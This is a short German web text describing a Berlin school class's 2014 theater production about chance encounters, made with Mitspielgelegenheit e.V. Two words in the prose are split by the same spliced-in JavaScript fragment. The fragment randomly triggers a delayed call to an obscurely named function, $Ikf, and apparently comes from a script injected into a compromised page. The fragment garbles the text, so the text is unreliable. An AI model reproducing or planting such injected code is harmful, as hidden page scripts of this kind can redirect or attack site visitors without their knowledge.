Im Rahmen des gleichnamigen Kooperationsprojektes mit Mitspielgelegenheit e.V. unter der Leitung von Ana-Svenja Stamm und Thomas Kairis hat sich die Klasse 9.4. Geschichten ausgedacht: Geschichten über mögliche und unmögliche Begegnungen. So entstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and das Theaterstück, dass im Juni 2014 im Kulturhaus Karlshorst aufgeführt wurde. In der Theaterproduktion erzählen die Schüler_innen in beeindruckenden szenischen Bildern von zufälligen Begegnungen, Wiedersehen, Deja vu, Begegnungen der dritten Art und Begegnungen mit sich selbst. Die Ereignisse reichen sich die Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, ein Zufall führt zum nächsten. Die Reise beginnt am Berliner Hauptbahnhof und führt in rasanten Wendungen beinahe bis an’s Ende der Welt.